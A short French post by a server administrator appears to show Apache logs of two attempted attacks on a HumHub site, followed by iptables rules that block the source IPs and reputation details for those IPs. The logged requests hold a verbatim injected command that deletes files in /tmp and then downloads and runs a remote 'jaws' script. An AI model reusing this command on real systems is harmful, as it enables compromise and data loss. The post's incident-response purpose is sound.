1 x served & 0 x viewed
Voici les logs :
grep "GET /shell" /var/log/apache2/access.humhub.log 178.129.246.3 - - [20/Jan/2021:03:00:09 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+ debes.venus.lol/jaws;sh+/tmp/jaws" 400 0 "-" "-" 46.209.56.107 - - [20/Jan/2021:16:43:59 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+ debes.venus.lol/jaws;sh+/tmp/jaws" 400 0 "-" "-"
Je vais donc bloquer les deux IP 178.129.246.3 & 46.209.56.107.
# iptables -A INPUT -s 178.129.246.3 -j DROP # iptables -A INPUT -s 46.209.56.107 -j DROP # iptables-save > /etc/iptables/rules.v4
Propriété de l’adresse IP 46.209.56.107
Localisation | Iran |
Réputation | 86 % |
Anonymat | Aucun détection |
Usage | Attribué |
Source | RIPE NCC |
Nom d’hote | 46.209.56.107 |
Propriété de l’adresse IP 178.129.246.3
Localisation | Russie |
Réputation | 29 % |
Anonymat | Aucun détection |
Usage | Attribué |
Source | RIPE NCC |
Nom d’hote | h178-129-246-3.dyn.bashtel.ru |